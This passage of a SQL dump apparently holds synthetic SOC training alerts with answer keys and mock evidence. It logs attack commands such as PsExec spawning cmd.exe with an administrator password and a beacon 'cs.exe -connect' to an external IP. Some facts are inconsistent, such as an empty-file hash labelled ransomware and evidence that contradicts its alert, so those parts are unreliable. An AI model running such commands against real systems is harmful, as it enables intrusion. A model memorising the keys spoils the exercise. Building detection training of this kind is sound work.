administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.335Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(687, 'Brute Force Attack Detected on RDP Service', 'high', 'Wazuh', 'Multiple failed login attempts detected from an external IP address targeting the RDP service on the network. The source IP is associated with known malicious activity.', 'Credential Attack', 'T1110', 1, 'Closed', 137, '{\"timestamp\":\"2026-01-11T08:15:24Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.92.26.102\",\"dst_ip\":\"192.168.1.10\",\"username\":\"administrator\",\"hostname\":\"corp-server-01\",\"failed_attempts\":35}', '2026-01-11 02:30:22', '2026-02-13 00:04:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.26.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Common username for administrative access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP has a high number of reports related to brute force activity, confirming this is a legitimate attack.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.336Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:15:24Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.26.102\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:31:22.336Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:15:24Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.26.102\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:30:22.336Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:15:24Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.26.102\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:29:22.336Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:15:24Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.26.102\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:28:22.336Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:15:24Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.26.102\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(688, 'Malware Detected - LockBit 3.0 Ransomware', 'critical', 'CrowdStrike', 'A known ransomware file associated with LockBit 3.0 was executed on a corporate workstation. The file hash matches a known malicious signature.', 'Malware', 'T1486', 1, 'closed', NULL, '{\"timestamp\":\"2026-01-11T10:37:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"hostname\":\"workstation-05\",\"command_line\":\"C:\\\\Users\\\\User\\\\Downloads\\\\ransom.exe\",\"file_hash\":\"f2d2c3e2345fabc1234567890defabc1234567890abcd1234567890efab1234c\"}', '2026-01-10 08:45:54', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f2d2c3e2345fabc1234567890defabc1234567890abcd1234567890efab1234c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 55 antivirus engines as LockBit 3.0 ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Users\\\\User\\\\Downloads\\\\ransom.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable associated with ransomware deployment\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is confirmed malicious with a high detection rate on VirusTotal, indicating a true positive ransomware attack.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(689, 'Phishing Email Containing Malicious URL', 'medium', 'Proofpoint', 'A phishing email purporting to be from a legitimate service was received by a user. The email contains a URL leading to a fake login page.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:22:10Z\",\"event_type\":\"email_received\",\"email_sender\":\"no-reply@secure-login.com\",\"username\":\"jdoe\",\"hostname\":\"mailserver-01\",\"url\":\"http://malicious-login.com/login\"}', '2026-01-09 23:23:58', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@secure-login.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Email sender domain detected in phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-login.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL leads to a phishing page attempting to steal credentials\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_url\",\"warn_user\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The URL in the email is confirmed malicious and is a known phishing site attempting to harvest credentials.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Containing Malicious URL\",\"date\":\"2026-02-01T20:32:22.337Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(690, 'Suspicious Network Connection from Internal System', 'low', 'Firewall', 'A network connection was observed from an internal system to an external IP address. The connection was flagged due to unusual activity patterns.', 'Network Anomaly', 'N/A', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T11:02:33Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"203.0.113.55\",\"hostname\":\"workstation-12\"}', '2026-01-10 14:41:41', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The external IP has no malicious activity reports, indicating this is likely benign activity.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(691, 'Ransomware Attack Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike beacon was detected on the network, originating from an external IP address known for malicious activity. The beacon was executed on a compromised internal machine, indicating potential ransomware deployment.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-WS-123\",\"command_line\":\"C:\\\\Program Files\\\\Common Files\\\\cs.exe -connect 203.0.113.45:443\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-09 17:36:25', '2026-02-16 18:05:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting Cobalt Strike C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Cobalt Strike payloads.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a Cobalt Strike beacon indicates an active attempt to deploy ransomware, necessitating immediate remediation.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(692, 'Suspicious Login Attempts Detected from Foreign IP', 'high', 'Wazuh', 'Multiple failed login attempts were detected from an IP address located in a region with no known business operations. This could indicate a potential brute force attack.', 'Brute Force', 'T1078', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.0.2.77\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER-01\",\"failed_attempts\":25}', '2026-01-09 16:58:08', '2026-02-22 14:26:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP frequently reported for login brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username for brute force attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hostname\",\"value\":\"CORP-SERVER-01\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by brute force attempts.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed login attempts from a suspicious IP address suggest a brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.339Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.77\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.339Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.77\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.339Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.77\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.339Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.77\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.339Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.77\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(693, 'Phishing Email with Malicious URL Detected', 'medium', 'Proofpoint', 'A phishing email was detected containing a malicious URL intended to harvest user credentials. The email was sent from a spoofed domain mimicking a trusted partner.', 'Phishing', 'T1566', 1, 'investigating', 237, '{\"timestamp\":\"2026-01-11T08:45:20Z\",\"event_type\":\"email_received\",\"email_sender\":\"alerts@trusted-partner.com\",\"username\":\"asmith\",\"malicious_url\":\"http://malicious-url.com/login\"}', '2026-01-09 20:28:49', '2026-03-04 15:58:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alerts@trusted-partner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Email domain appears to be spoofed.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-url.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known for phishing attempts.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"asmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user targeted by phishing attempt.\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The malicious URL and spoofed domain indicate a phishing attempt to steal user credentials.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious URL Detected\",\"date\":\"2026-02-01T20:32:22.340Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please 
check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(694, 'Failed RDP Access from Known Safe IP', 'low', 'Firewall', 'A failed RDP access attempt was logged from an IP address previously whitelisted for remote connections. The activity appears to be benign.', 'Brute Force', 'T1078', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T12:30:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"username\":\"mnguyen\",\"hostname\":\"CORP-RDP-SERVER\",\"failed_attempts\":3}', '2026-01-10 16:12:35', '2026-02-22 14:53:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"IP address is whitelisted for remote access.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mnguyen\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User confirmed to have attempted RDP login.\"}},{\"id\":\"artifact_3\",\"type\":\"hostname\",\"value\":\"CORP-RDP-SERVER\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"RDP server receiving authorized connection attempts.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is whitelisted, indicating the failed login attempts are likely a result of user error rather than malicious intent.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(695, 'LockBit Ransomware Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike beacon was detected communicating with a known LockBit ransomware command and control server. The affected machine is showing signs of ransomware infection.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T03:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.15.23\",\"dst_ip\":\"185.199.110.153\",\"username\":\"jdoe\",\"hostname\":\"CORP-WKSTN-45\",\"command_line\":\"powershell.exe -nop -w hidden -enc aW5mbw==\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-10 03:14:01', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.110.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP reported 1203 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc aW5mbw==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicating potential malicious activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File hash associated with LockBit ransomware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a Cobalt Strike beacon and known ransomware file hash confirms the infection.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, 
NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(696, 'Suspicious RDP Login Attempts Detected', 'high', 'Wazuh', 'Multiple failed RDP login attempts detected from an external IP address. The attempts indicate a potential brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"RDP-SERVER\",\"failed_attempts\":37}', '2026-01-09 18:53:30', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"37 failed logons against the admin account from a single external IP with a known brute-force reputation is a true positive. Before closing, search for any successful logon from 203.0.113.45 after the failures, since a success would turn this from an attempt into a compromise. Blocking the source and resetting the targeted account are the minimum; RDP on 192.168.1.10 should not be reachable from the internet at all and that exposure should be raised as a finding.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.343Z\",\"source\":\"WinEventLog:Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account Name: admin, Logon Type: 10, Source Network Address: 203.0.113.45, Workstation Name: RDP-SERVER\",\"host\":\"RDP-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:31:22.343Z\",\"source\":\"WinEventLog:Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account Name: admin, Logon Type: 10, Source Network Address: 203.0.113.45, Workstation Name: RDP-SERVER [Repeated event count: 1]\",\"host\":\"RDP-SERVER\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:30:22.343Z\",\"source\":\"WinEventLog:Security\",\"event_code\":\"4625\",\"message\":\"An account failed to log on. Account Name: admin, Logon Type: 10, Source Network Address: 203.0.113.45, Workstation Name: RDP-SERVER [Repeated event count: 